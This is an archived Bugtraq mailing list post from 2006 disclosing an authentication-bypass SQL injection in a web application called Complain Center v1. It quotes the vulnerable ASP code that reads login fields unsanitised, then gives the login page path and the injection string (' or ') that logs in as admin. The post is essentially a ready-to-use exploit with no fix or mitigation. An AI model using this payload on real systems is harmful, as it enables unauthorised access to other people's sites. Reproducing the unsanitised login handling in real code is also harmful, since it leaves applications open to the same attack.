Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

From: ajannhwt () hotmail com
Date: 14 Sep 2006 20:02:01 -0000
ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey
Previous By Date Next
Previous By Thread Next

Current thread: